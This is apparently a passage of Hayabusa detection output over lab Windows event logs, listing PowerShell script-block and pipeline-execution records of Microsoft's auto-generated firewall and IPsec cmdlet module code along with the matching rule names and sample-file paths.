[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): 
name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.216 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.216 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.216 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.217 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.220 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.221 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.221 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.221 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.222 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.250 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] 
${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, 
$script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 